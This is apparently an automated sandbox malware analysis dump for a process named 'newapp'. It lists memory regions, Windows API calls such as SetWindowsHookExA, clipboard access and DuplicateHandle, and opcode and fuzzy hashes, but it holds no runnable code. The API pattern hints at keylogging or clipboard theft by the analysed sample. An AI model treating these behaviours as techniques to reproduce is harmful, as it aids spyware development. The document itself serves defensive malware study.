                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: 93a38aa0f8efe4cad2d7e79f58c61d4c96bf216f775ec8edec7a0d34ac024c30
                                                                                                                • Instruction ID: 68784eebf3b81593abe6882460155bf14aa16921fd8e9f6d843e80d6b854fdbb
                                                                                                                • Opcode Fuzzy Hash: 93a38aa0f8efe4cad2d7e79f58c61d4c96bf216f775ec8edec7a0d34ac024c30
                                                                                                                • Instruction Fuzzy Hash: C53122B0E01248DFDB14DF99C984BDEBBF5AF48304F208019E404BB294D7746989CF95
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 6308dcc69aab00bb1479c67b1b76d96252758033c41a1862bff280e3665e56c4
                                                                                                                • Instruction ID: c0afb511760013cc69a49e2ad20b6f1925d542dcf76982dc67e90ad8a38facf0
                                                                                                                • Opcode Fuzzy Hash: 6308dcc69aab00bb1479c67b1b76d96252758033c41a1862bff280e3665e56c4
                                                                                                                • Instruction Fuzzy Hash: 43219FB18093988FCB11DFA9C9547DEBFF4EF4A320F14409AD495A7251C374A948CBA5
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067EA577
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 84ad8d9ea6590eda7b4f3589c439bfb777456a6667a604031b270ca3aa1ace63
                                                                                                                • Instruction ID: 11ceb64f031c1c24c16d9905ba9d834d4ec26ab4a9c870a1ab23fa1af59f8e15
                                                                                                                • Opcode Fuzzy Hash: 84ad8d9ea6590eda7b4f3589c439bfb777456a6667a604031b270ca3aa1ace63
                                                                                                                • Instruction Fuzzy Hash: A321E3B5D00259DFDB10CFAAD984AEEBFF4EB49310F14806AE955A7210C374A984CFA5
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067EA577
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: b67141ebe0f5ee62728e342cde1b6da85d5c11609325a3dc0963b329029e4abd
                                                                                                                • Instruction ID: 39c20dd25cc4dac2f6321e95094b6643f372332ff57fab7e449f09b92c0184db
                                                                                                                • Opcode Fuzzy Hash: b67141ebe0f5ee62728e342cde1b6da85d5c11609325a3dc0963b329029e4abd
                                                                                                                • Instruction Fuzzy Hash: 8321E4B5D00208DFDB10CF9AD984ADEBFF4EB48310F14801AE914A7310C374A984CFA5
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067EDF23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 4b31ecee7124ee9225770ce3fad609a959c488879a2ba6e65d07833d1459571c
                                                                                                                • Instruction ID: 824578b96a501eb25a3564e6e461cc1d1b601febdd20e1bafda945f9be80c28f
                                                                                                                • Opcode Fuzzy Hash: 4b31ecee7124ee9225770ce3fad609a959c488879a2ba6e65d07833d1459571c
                                                                                                                • Instruction Fuzzy Hash: 842124B5D002099FCB14DF9AD844BEEFBF5AF88324F10842AE459A7250CB74A944CFA5
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067EDF23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 451ef8b89af92183662ec867f5d99738d10113c9aae7e4189977cb607afd325a
                                                                                                                • Instruction ID: a543e4407aeadd02461df3aeef4e55b047d3111104ff440d9f1254365d95195d
                                                                                                                • Opcode Fuzzy Hash: 451ef8b89af92183662ec867f5d99738d10113c9aae7e4189977cb607afd325a
                                                                                                                • Instruction Fuzzy Hash: 3821F2B5D002099FCB54DF9AD844BEEFBF5AF88320F10842AE459A7250C779A944CFA5
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0292EFE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2925048973.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_2920000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: e5779dc042f58ce289159afdd7222b097a5893802ff5b881582f5a175cdeb5d3
                                                                                                                • Instruction ID: 446e14be1b36c8f87e0348be9a9ecfb38557d9a8f13a96d57bd5a2e47f775a0f
                                                                                                                • Opcode Fuzzy Hash: e5779dc042f58ce289159afdd7222b097a5893802ff5b881582f5a175cdeb5d3
                                                                                                                • Instruction Fuzzy Hash: E91123B1D002699BCB10DF9AD544BDEFBF4AF48320F14816AE818A7250D378A944CFA5
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 067E5716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 00294bd164852cf39ee75e70a35d6fb383455d28df75588005920619ccd340c6
                                                                                                                • Instruction ID: d2c4311f6f903b1a9f101012737c0a23ee92b5fa462511edfa209919b8a9929e
                                                                                                                • Opcode Fuzzy Hash: 00294bd164852cf39ee75e70a35d6fb383455d28df75588005920619ccd340c6
                                                                                                                • Instruction Fuzzy Hash: 591120B5D00248CFDB20CF9AC844ADEFBF5EB88324F10842AD469A7210D376A549CFA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 067E5716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: bbf1b549df97c00c3a12d2b19ea7606e6ea0f8505a77a2bcbedb373759133ec8
                                                                                                                • Instruction ID: 5dfdb085675ee4a8903fe3039e992f8e02309f45f29727f7b6738621a67d1814
                                                                                                                • Opcode Fuzzy Hash: bbf1b549df97c00c3a12d2b19ea7606e6ea0f8505a77a2bcbedb373759133ec8
                                                                                                                • Instruction Fuzzy Hash: 881102B5D00349CFEB10DF9AC444ADEFBF4EB89224F10846AD859B7210D375A549CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 067EBFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 0131ec311ada47c9e64c6337237e117beccf649900ddaf90198e1eb2d9a3c27a
                                                                                                                • Instruction ID: c5c007a8fb6335c1f912a371e450cc2e38d31aec784026a5e877586100ed91d0
                                                                                                                • Opcode Fuzzy Hash: 0131ec311ada47c9e64c6337237e117beccf649900ddaf90198e1eb2d9a3c27a
                                                                                                                • Instruction Fuzzy Hash: 8C1136B59003488FDB20DFAAD949BDEBFF8EB48324F108459D558A7210C379A548CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 067EBFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 66b354c90d6eb291b57e2cb081632d170ee6aa56af9716c899f808d394b4faaa
                                                                                                                • Instruction ID: ff1b07872c463e479fbce76121a9a1a3f3f1c11f6a18c7b595f36d90b568f149
                                                                                                                • Opcode Fuzzy Hash: 66b354c90d6eb291b57e2cb081632d170ee6aa56af9716c899f808d394b4faaa
                                                                                                                • Instruction Fuzzy Hash: BC1133B49003488FDB20DF9AD544BDEBFF4EB48324F108419D559A7210C378A944CFA5
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 8bc5215221468043a7b270c5e9e9f06b45468e0162483f792609b3d16a0a2c13
                                                                                                                • Instruction ID: a5e958e9c23e4d6d923f51823e5cbfdf78d98ac126df0ff2fb108024d470777f
                                                                                                                • Opcode Fuzzy Hash: 8bc5215221468043a7b270c5e9e9f06b45468e0162483f792609b3d16a0a2c13
                                                                                                                • Instruction Fuzzy Hash: B51122B1900248CFCB60DF9AC584B9EBFF4EB48324F208429D519A7210C374A944CFA5
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 091ca4864f9270b952b84fe88bd40feb21a9521e45fb26c1c89960e311291fd2
                                                                                                                • Instruction ID: 134a606b1695a5bc21350f1cc1d32567a8192bbdcc44ca39cfd9134c698a0e92
                                                                                                                • Opcode Fuzzy Hash: 091ca4864f9270b952b84fe88bd40feb21a9521e45fb26c1c89960e311291fd2
                                                                                                                • Instruction Fuzzy Hash: FC1122B1800248CFCB10DF9AC988BDEFFF4EB48324F208429D519A3210D374A944CFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 2397998875aeb710134da9704aecbceff009db4f26467d2fefc57953b3226c81
                                                                                                                • Instruction ID: deaf77e685189e3a79ae8a44e294c96a6e1c0ea50c6bda2af4a7b3c5cbdf9fe7
                                                                                                                • Opcode Fuzzy Hash: 2397998875aeb710134da9704aecbceff009db4f26467d2fefc57953b3226c81
                                                                                                                • Instruction Fuzzy Hash: B341B370E10305DFDB61DFA5C454AAEBBB2BF85300F204929E501EB344DB75D946CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 72400ccb463b7136cb1ee9ef1e68a75544f412ca9e4f6675d422ce511048b8f2
                                                                                                                • Instruction ID: 76b34272c5669ea3afb224b0d4278807db7295d939ac97cd14fd420984e0d5e5
                                                                                                                • Opcode Fuzzy Hash: 72400ccb463b7136cb1ee9ef1e68a75544f412ca9e4f6675d422ce511048b8f2
                                                                                                                • Instruction Fuzzy Hash: 2031D230B102018FDB559BB4D514A7E7BE3BF89200F20452DE516DB38ADE36DE46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: f456acf335a2e7a284dd0fcc21cb8724c548950a68d2b6542c067ff0276d703a
                                                                                                                • Instruction ID: b99512fcda715a3465cda330c5e6c92668eca3d1ca2392c38e2a785885af572d
                                                                                                                • Opcode Fuzzy Hash: f456acf335a2e7a284dd0fcc21cb8724c548950a68d2b6542c067ff0276d703a
                                                                                                                • Instruction Fuzzy Hash: BF31FF30B103028FDB559BB0D514A7E7BA3BF89200F254468E516CB396DF3ACE42CB92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \Ocq
                                                                                                                • API String ID: 0-2995510325
                                                                                                                • Opcode ID: 2d5b737cc84c75c8be8f7f0bb31ed71571417fba1d5aae137101f0f1f5b5bfef
                                                                                                                • Instruction ID: 83327b1be66ff5ac409fa20b1f155897dc2b89243dd21211b865f4ae537a62fc
                                                                                                                • Opcode Fuzzy Hash: 2d5b737cc84c75c8be8f7f0bb31ed71571417fba1d5aae137101f0f1f5b5bfef
                                                                                                                • Instruction Fuzzy Hash: 22F0DA70A20119DBDB14DF94E899BAEBBB2BF88700F204519E502A739ACB751C01CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b1a1cf3d86e44271bda3fa010b73e0a3cecdc3b9b18b17d8d3999314c5491d6a
                                                                                                                • Instruction ID: d82ba81162ca1c9ecaaef11d34d36a1bdf1834a250cd6fdfe9868b0a7eb8de55
                                                                                                                • Opcode Fuzzy Hash: b1a1cf3d86e44271bda3fa010b73e0a3cecdc3b9b18b17d8d3999314c5491d6a
                                                                                                                • Instruction Fuzzy Hash: 9461C071F100214FCF509B7EC884AAFAAD7AFC5620B15443AD90EDB364EE66DD0287D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 668d613d6481dba6a67863c55b468c9a2768fe90de57ebb9690a288d38a1bd29
                                                                                                                • Instruction ID: 09fc04e2cfcc130fb82e4b31ac54728c260e04ab71dd08151ec6a60b1c1fff63
                                                                                                                • Opcode Fuzzy Hash: 668d613d6481dba6a67863c55b468c9a2768fe90de57ebb9690a288d38a1bd29
                                                                                                                • Instruction Fuzzy Hash: E9814C30B102059FDF54DFA8D554BAEB7F2AF89304F148529D50AEB399EB34EC428B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 24cce4c8dbfcb86d2abaaa794864a289a91536d6f65d309eb7692f8f5043427e
                                                                                                                • Instruction ID: 92e2f0e10b1cd01f9c5735fb645d76ec4ac6761831fa72b9d416fe9d0f7b4ad7
                                                                                                                • Opcode Fuzzy Hash: 24cce4c8dbfcb86d2abaaa794864a289a91536d6f65d309eb7692f8f5043427e
                                                                                                                • Instruction Fuzzy Hash: A7914E30E102198FDF60DF68C990B9DB7B1FF89310F208699D549AB355EB70AA85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 86b340afc00a6f6b92c635983518321636afd3d0b94c97d7e299054ea3816567
                                                                                                                • Instruction ID: 4ec22a93fc7ca4c4d83b40705393f2bfc9b216e1c23c66739ae1bd1140b2667a
                                                                                                                • Opcode Fuzzy Hash: 86b340afc00a6f6b92c635983518321636afd3d0b94c97d7e299054ea3816567
                                                                                                                • Instruction Fuzzy Hash: 21913E30E1061A8BDF60DF68C980B9DB7B1FF89310F208599D549BB355EB70AA85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 469d037816f765c9b68df803ac158d5dd5fe1bdb5669e3499e5253682ad80cd9
                                                                                                                • Instruction ID: c9e6c93936cc322bc0a27b48ef5a935149ed3cc5491f94399c7a3cac69c66cb1
                                                                                                                • Opcode Fuzzy Hash: 469d037816f765c9b68df803ac158d5dd5fe1bdb5669e3499e5253682ad80cd9
                                                                                                                • Instruction Fuzzy Hash: 98716E70A102089FDB54DFA8D984EADBBF6FF88300F148529D505EB365DB74E946CB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 34ac1611ce71f167881e12060e3cf74369c462fd5e872ac601d41c823db190b0
                                                                                                                • Instruction ID: a95f730f9ac1ddd4619d2fa3485a7b4a174193e8ea88dc24b7ce92750d2fd7a3
                                                                                                                • Opcode Fuzzy Hash: 34ac1611ce71f167881e12060e3cf74369c462fd5e872ac601d41c823db190b0
                                                                                                                • Instruction Fuzzy Hash: 9A715D70A102089FDB54DFA8C980AADBBF6FF88300F148529D505EB369DB75ED46CB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c671c8f45e97e87845e563511b1a5a9f9959c1e6e9f15fb239f077a0cbbc812f
                                                                                                                • Instruction ID: a352d71e2a1171d591f58add0cbe1437c5032ac8923854032907c81e8c4cac3c
                                                                                                                • Opcode Fuzzy Hash: c671c8f45e97e87845e563511b1a5a9f9959c1e6e9f15fb239f077a0cbbc812f
                                                                                                                • Instruction Fuzzy Hash: 2E51E631E10105DFDB64EB78E454AADBBB2FF88315F208869E206DB355DF399846CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c904359f43126b1890d15da458acd6e25fe80fe86f78e566eefed879e4c1e6b0
                                                                                                                • Instruction ID: 0c8567b055101e7be2f090d7f5aa498004e1ef6a9f51b95fa44d328a98658ee9
                                                                                                                • Opcode Fuzzy Hash: c904359f43126b1890d15da458acd6e25fe80fe86f78e566eefed879e4c1e6b0
                                                                                                                • Instruction Fuzzy Hash: E051B830B202149FEF64577CD8A4B7F2A5BD789710F20492AE60AD73A5DE6DCC468392
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fbfe60dab8470589eedbfedf399db1e75d1741e8b072fa859d921780a3a61114
                                                                                                                • Instruction ID: c33f3cd042b18b15e815d1940d92e6733617ff3d7de75e937e3447dd02f502c1
                                                                                                                • Opcode Fuzzy Hash: fbfe60dab8470589eedbfedf399db1e75d1741e8b072fa859d921780a3a61114
                                                                                                                • Instruction Fuzzy Hash: DF51C930B202149FEF64677CD854B3F265FD789710F20492AE60AD73A5DE6DCC468392
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 761f7bfd5a70783b8701fd62098deb8b3237563984cf824bcc0b2ef8e8397d41
                                                                                                                • Instruction ID: 4b1eb968a420b9baa62437c277bd7fc3fd455e8373ffa96c3d599aa4a2828a26
                                                                                                                • Opcode Fuzzy Hash: 761f7bfd5a70783b8701fd62098deb8b3237563984cf824bcc0b2ef8e8397d41
                                                                                                                • Instruction Fuzzy Hash: 3E417F71E106058FEF60CFA9D880ABFFBB2FB65310F10492AE256D7250D730E9458B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d9ec09903c45d2bbaedede2014d333a1d91b1db42ef13f9fb4297523ad64920
                                                                                                                • Instruction ID: 3a0518ce690d6917e9000a7d4554aed12335feeca0bdb6187975c9f51f2cd90d
                                                                                                                • Opcode Fuzzy Hash: 7d9ec09903c45d2bbaedede2014d333a1d91b1db42ef13f9fb4297523ad64920
                                                                                                                • Instruction Fuzzy Hash: 3141F671E202058FEF608F68C480ABEFBB1FB55320F258566E665DB352D234EC81C7A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35adde6e802c93c1c43208c009bb44a81a2e5bf6052c51491107782a814c9365
                                                                                                                • Instruction ID: 1570c5ba364dca3536a863bf6a9d7574effcfccf60a72d08c12a3ecf81aa09c0
                                                                                                                • Opcode Fuzzy Hash: 35adde6e802c93c1c43208c009bb44a81a2e5bf6052c51491107782a814c9365
                                                                                                                • Instruction Fuzzy Hash: 4D31A630E2070A8FDF65DF65C980A9EBBF2FF85304F144929E505AB354EB70E9468B41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8333693df3e2ca1211f25e0992aa9eaa5805120c68379b2b50cec5b0268b5aa2
                                                                                                                • Instruction ID: 794d33d3e3d0b5aeb49d23c6890a456991840845726d169b2c788f3be1e35595
                                                                                                                • Opcode Fuzzy Hash: 8333693df3e2ca1211f25e0992aa9eaa5805120c68379b2b50cec5b0268b5aa2
                                                                                                                • Instruction Fuzzy Hash: 9F316230E1060A9FCB54DFA4D854AAEB7B2EF89300F148529E916EB351DB71AD42CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9fa5ba0fd426a6747cac0498cfc3da315fb88173512bd1c3b461dbdbb33b8ad5
                                                                                                                • Instruction ID: 96eaf7869eb63854be80fe3d758e8e2362802c89c430703f27516431843ae713
                                                                                                                • Opcode Fuzzy Hash: 9fa5ba0fd426a6747cac0498cfc3da315fb88173512bd1c3b461dbdbb33b8ad5
                                                                                                                • Instruction Fuzzy Hash: CC317E30E1060A9FCB58DFA4D854AAEB7B2EF89300F148529E916EB351DB71ED42CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
